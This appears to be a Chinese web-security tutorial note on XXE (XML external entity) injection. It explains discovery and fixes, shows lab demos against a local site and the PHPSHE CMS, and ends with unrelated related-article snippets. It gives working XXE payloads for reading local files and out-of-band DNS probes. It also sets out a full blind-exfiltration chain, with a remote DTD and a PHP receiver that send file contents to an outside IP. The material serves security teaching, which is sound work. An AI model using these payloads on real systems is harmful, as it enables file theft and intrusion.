059-Web攻防-XXE安全DTD实体复现源码等

news/2025/9/19 18:20:54/文章来源:https://www.cnblogs.com/HalfwayMousie/p/19101467

059-Web攻防-XXE安全&DTD实体&复现源码等

知识点

XML&XXE-传输-原理&探针&利用&玩法

XML&XXE-黑盒-JS&黑盒测试&类型修改

XML&XXE-白盒-CMS&PHPSHE&无回显

什么是XML?

XML 被设计为传输和存储数据,XML 文档结构包括 XML 声明、DTD 文档类型定义(可

选)、文档元素,其焦点是数据的内容,其把数据从 HTML 分离,是独立于软件和硬件的

信息传输工具。等同于 JSON 传输

XXE 漏洞 XML External Entity Injection

即 xml 外部实体注入漏洞,XXE 漏洞发生在应用程序解析 XML 输入时没禁止外部实体

的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网扫描、攻击内网等危

害。

XML 与 HTML 的主要差异:

XML 被设计为传输和存储数据,其焦点是数据的内容。

HTML 被设计用来显示数据,其焦点是数据的外观。

HTML 旨在显示信息 ,而 XML 旨在传输存储信息。

Example:网站的 xml 文件解析

  • 第一种为xml格式传输
  • 第二钟常规传输
  • 第三种为json传输

image-20250526193322113

image-20250526193500458

-XXE 黑盒发现漏洞:

1、获取得到 Content-Type 或数据类型为 xml 时,尝试 xml 语言 payload 进行测试

2、不管获取的 Content-Type 类型或数据传输类型,均可尝试修改后提交测试 xxe

3、XXE 不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成

文件中的 XXE Payload 被执行

4、流量包里面对关键字进行筛选<?xml

-XXE 白盒发现:

1、可通过应用功能追踪代码定位审计

2、可通过脚本特定函数搜索定位审计

3、可通过伪协议玩法绕过相关修复等

XXE 修复防御方案:

-方案 1-禁用外部实体

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf

=DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferenc

es(false);

Python:

from lxml import etreexmlData =

etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

—方案2-过滤用户提交的XML数据

过滤关键字:<!DOCTYPE 和<!ENTITY,或者 SYSTEM 和 PUBLIC

XML&XXE-传输-原理&探针&利用&玩法

参考:https://www.cnblogs.com/20175211lyz/p/11413335.html

1、读取文件:有回显

1、读取文件:
<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM  "file:///d:/1.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>

简单案例

  • 在本地搭建的xxe网站登录进行抓包
  • 修改请求 复制粘贴上面的代码 读取我D盘下事先准备好的文件1.txt
  • 读取成功
  • image-20250526200531608
  • image-20250526200750387
  • image-20250526200844186
  • image-20250526201224120

1.1、带外测试:无回显

<?xml version="1.0" ?>
<!DOCTYPE test [<!ENTITY % file SYSTEM "http://y80f9n.dnslog.cn">%file;
]>
<user><username>&send;</username><password>Mikasa</password></user>

简单案例

  • 修改代码 将上面的代码复制粘贴到请求包里面
  • image-20250526203637755
  • image-20250526203812084
  • image-20250526203836548

2、外部引用实体dtd:无回显

<?xml version="1.0" ?>
<!DOCTYPE test [<!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">%file;
]>
<user><username>&send;</username><password>Mikasa</password></user>evil2.dtd:
<!ENTITY send SYSTEM "file:///d:/e.txt">

简单案例

  • 在本地目录下面写好我们的text.txt将后缀修改为dtd文件内容如下
  • 将此文件放在www文件夹下面
  • 打开登录界面进行抓包

image-20250527102134810

image-20250526205918363

image-20250527102011574

问题:test.dtd为什么读取的是我本机上面的d盘下的1.txt而不是我虚拟机上面的

XXE 中的 file:// 是一个本地文件 URI 协议,表示访问当前操作系统本地的文件系统。

所以:文件路径是相对于“XML 解析器”运行所在的系统,而不是相对于 DTD 所在的服务器。

  • image-20250527103024461
  • 让 XML 在虚拟机中被解析:让你的服务程序(比如 DVWA、Java Web 服务、PHP)在虚拟机里运行,那 XXE 攻击读取的就是虚拟机里的文件。
  • 将虚拟机中的文件通过 HTTP 暴露出来<!ENTITY send SYSTEM "http://<虚拟机IP>:8081/1.txt">

3、无回显读文件

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/2.txt"> 
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>解释:
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/2.txt"> //定义一个外部实体 file,它的内容是本地 D 盘上的 2.txt 文件内容
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
//再定义一个实体 remote,告诉解析器去远程加载 test.dtd 文件。
%remote;//加载并执行 test.dtd 中的内容(这是关键,像 include 一样)
%all;//加载 test.dtd 中定义的 %all 实体(下一步会看到它的作用)。
]>
<root>&send;</root>//最终输出实体 send 的内容,它是在远程的 test.dtd 中间接定义的test.dtd:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">
//这里定义了一个实体 %all,它的内容是再定义一个名叫 send 的实体。
这个 send 的值是一个远程 URL,它包含 %file;,也就是之前读取到的 d:/2.txt 文件内容
最终,&send; 会被替换为对这个 URL 的请求(比如 get.php?file=secret123),从而把敏感文件内容发送到攻击者服务器上。get.php<?php 
$data=$_GET['file'];
$myfile=fopen("file.txt","+w");
fwrite($myfile,$data);
fclose($myfile);
?>//这个脚本的作用是保存 XML 请求中泄露出来的文件内容[目标机器解析 XML]↓
读取 file:///d:/2.txt 成为实体 file↓
从 http://47.94.236.117/test.dtd 加载恶意 DTD↓
test.dtd 定义 send → 包含敏感文件内容的 URL↓
XML 中出现 &send; → 向攻击者网站发出请求↓
get.php 接收数据并保存为 file.txt

简单案例

  • 本地目录下面创建2.txt内容如下文件里面的内容不能是中文 XML 解析器要求 URI 必须是符合标准格式的 ASCII 字符串
  • 在虚拟机本地目录下面写入文件test1.txt写完修改后缀为dtd并在目录下面写入get.php文件
  • 在登录页面访问抓包 将上面的代码复制到请求包里面
  • image-20250527111713073
  • image-20250527104806528
  • image-20250527105000362
  • image-20250527112324422
  • image-20250527112315089

黑盒测试:观察数据的格式

白盒测试:处理数据的函数和框架

4、其他玩法(协议)-见参考地址

参考:https://www.cnblogs.com/20175211lyz/p/11413335.html

当无回显时我们应该想到三个问题:

    1. 无漏洞
    2. 无回显
    3. payload有问题

XML&XXE-黑盒-JS&黑盒测试&类型修改

http://web.jarvisoj.com:9882/XXE 黑盒发现:
1、获取 Content-Type 或数据类型为 xml 时,尝试进行 xml 语言 payload 进行测试

2、不管获取的 Content-Type 类型或数据传输类型,均可尝试修改后提交测试 xxe流程:功能分析-前端提交-源码&抓包-构造 Paylod 测试更改请求数据格式:Content-Type

<?xml version="1.0" ?>
<!DOCTYPE ANY [<!ENTITY f SYSTEM "file:///d:/1.txt">
]>
<x>&f;
</x>

ML&XXE-白盒-CMS&PHPSHE&无回显

审计流程简单案例:

  1. 漏洞函数simplexml_load_string用来把 XML 字符串转换成一个可以操作的对象(类似数组)**,方便你读取或处理 XML 数据

  2. pe_getxml函数调用了漏洞函数右键 转到 申明和用力查看调用的地方

  3. wechat_getxml调用了pe_getxml

  4. notify_url 调用了wechat_getxml

  5. 访问Notify_url文件 抓包 出发wechat_getxml函数,构造payload测试 无回显 使用带外

  6. 先尝试读取文件,无回显后带外测试

    <?xml version="1.0" ?>
    <!DOCTYPE ANY [<!ENTITY f SYSTEM "file:///d:/1.txt">
    ]>
    <x>&f;
    </x>
    

    image-20250527141938067

    image-20250527142041550

    image-20250527142203116

    image-20250527142335009

    image-20250527142502209

    image-20250527142748506

    image-20250527144349772

    image-20250527144459795

    image-20250527145806368

    image-20250527145835056

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/907996.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

061-WEB攻防-PHP反序列化原生类TIPSCVE绕过漏洞属性类型特征

061-WEB攻防-PHP反序列化&原生类TIPS&CVE绕过漏洞&属性类型特征知识点 1、PHP-反序列化-属性类型&显示特征 2、PHP-反序列化-CVE绕过&字符串逃逸 3、PHP-反序列化-原生类生成&利用&配合1、…

051-Web攻防-文件安全目录安全测试源码等

051-Web攻防-文件安全&目录安全&测试源码等 知识点1、文件安全-前后台功能点-下载&读取&删除 2、目录安全-前后台功能点-目录遍历&目录穿越演示案例:➢文件安全-下载&删除-案例黑白盒 ➢目录…

Dilworth定理及其在算法题中的应用

1. Dilworth定理 Dilworth定理由数学家Robert P. Dilworth于1950年提出,它描述了偏序集中链和反链之间的关系。偏序集:一个集合 equipped with a partial order(即一个自反、反对称、传递的关系)。 链:偏序集的一…

error: xxxxx does not have a commit checked out

$ git commit -m "test" *error: AW30N does not have a commit checked outfatal: updating files failed解决方法: 删除多余的文件夹AW30N

049-WEB攻防-文件上传存储安全OSS对象分站解析安全解码还原目录执行

049-WEB攻防-文件上传&存储安全&OSS对象&分站&解析安全&解码还原&目录执行-cnblog#文件-解析方案-执行权限&解码还原 1、执行权限文件上传后存储目录不给执行权限 原理:开启禁止目录执行…

云原生周刊:MetalBear 融资、Chaos Mesh 漏洞、Dapr 1.16 与 AI 平台新趋势

云原生热点 MetalBear 获得 1250 万美元种子轮融资,推动 Kubernetes 开发解决方案 以色列初创公司 MetalBear 宣布完成 1250 万美元种子轮融资,由 TLV Partners 领投,TQ Ventures、MTF、Netz Capital 及多位知名天使…

AI一周资讯 250913-250919

原文: https://mp.weixin.qq.com/s/bnJ-kyOojPi6rqgx0NOXxg 阿里版Cursor正式收费!Qoder全球推出付费订阅,小白用了都说“最懂我” 2025年9月15日,阿里AI编程平台Qoder(被称为“阿里版Cursor”)面向全球用户正式推…

045-WEB攻防-PHP应用SQL二次注入堆叠执行DNS带外功能点黑白盒条件-cnblog

045-WEB攻防-PHP应用&SQL二次注入&堆叠执行&DNS带外&功能点&黑白盒条件-cnblog PHP-MYSQL-二次注入-DEMO&74CMS1、DEMO-用户注册登录修改密码1.注册新用户时,将注入的内容包含在注册的用户名…

linux 命令语句

rt 快csp初赛了,发现s组第一题一般是linux 命令语句,碎屑。 c cat:连接和显示文件内容 cd:切换工作目录 chmod:修改文件或目录的权限 chown:修改文件或目录的所有者 cp:复制文件或目录 d df/du:显示磁盘使用情…

用 Kotlin 实现英文数字验证码识别

在本教程中,我们将使用 Kotlin 和 Tesseract OCR 库实现对英文数字验证码的识别。Tesseract 是一个开源的 OCR 引擎,能够从图像中提取文本内容。结合 Kotlin 的简洁语法,我们可以高效地完成这个任务。环境准备 (1)…

UM2003A 一款 200 ~ 960MHz ASK/OOK +18dBm 发射功率的单发射

UM2003A 一款 200 ~ 960MHz ASK/OOK +18dBm 发射功率的单发射Si24R03 是一款高度集成的低功耗 SOC 芯片,其集成了基于 RISC-V 核的低功耗 MCU 和工作在 2.4GHz ISM 频段的无线收发器模块。 MCU 模块具有低功耗、L…

达芬奇(DaVinci Reslove)字体文件 bugb标签

今天有小伙伴 突然 反馈 字幕轨导 execl的插件 字幕没有导出来。我拿到 srt文件是 文件1这样格式,我导入字幕轨后 ,再导出来 格式变了 多了 一个 <…

语音芯片怎样挑选?语音芯片关键选型要点?

语音芯片怎样挑选?语音芯片关键选型要点? 选择语音芯片需根据具体应用场景和性能需求进行综合评估,以下是关键选型要点: 一、核心性能参数 1、采样率与信噪比 高采样率(如16位ADC)可减少声音失真,信噪比≥75dB能…

KingbaseES Schema权限及空间限额

一、权限授予操作 1. 基础权限赋予 1.1 创建测试环境-- 1.创建测试用户 test=# CREATE USER schema_user WITH PASSWORD Schema@123; CREATE ROLE-- 2.创建测试Schema test=# CREATE SCHEMA test_schema AUTHORIZATION…

UM2003A 一款 200 ~ 960MHz ASK/OOK +18dBm 发射功率的单发射芯片

UM2003A 一款 200 ~ 960MHz ASK/OOK +18dBm 发射功率的单发射芯片UM2003A 是一款工作于 200 ~ 960MHz 频段的单片集成、高性能、可独立运行的 OOK 发射器。内部集成的 OTP 方便用户对各种射频参数以及特色功能进行编程…

HTTP库开发实战:核心库与httpplus扩展库示例解析

实战导向的HTTP库开发教程!本文以核心库基础功能为起点,结合httpplus扩展库示例,演示如何高效实现HTTP协议相关功能。 一、两个库有何不同? 首先需要了解,LuatOS采用核心库和扩展库的模块化设计,核心库负责底层与…

QMT交易系统向服务器同步订单丢失问题排查

QMT交易系统向服务器同步订单丢失问题排查1.挂单系统报错,异步挂单后订单挂单回调更新OrderID报错:查找对象为空,起初以为是多线程共享对象属性同步不及时造成的,后来发现在异步挂单执行完毕才对RequestOrderStock…

笔记1

1、bug包含哪些内容 ? 所属产品、所属模块、所属项目、当前指派、bug类型、操作系统、浏览器、bug标题、严重程度、优先级、重新步骤、相关需求2、bug的等级? 1级bug (致命bug) 2级bug (严重bug) 3级bug (一…

用 Python 和 Tesseract 实现英文数字验证码识别

本教程将教您如何使用 Python 和 Tesseract OCR 引擎来识别英文数字验证码。Tesseract 是一个非常强大的 OCR 引擎,支持多种语言的字符识别。结合 Python 的易用性,我们可以很容易地完成验证码识别。环境准备 (1)安…

深入解析:上门按摩平台 “0 抽成 + 无底薪” 双模式拆解:如何让技师主动创收?

深入解析:上门按摩平台 “0 抽成 + 无底薪” 双模式拆解:如何让技师主动创收?2025-09-19 17:51 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overfl…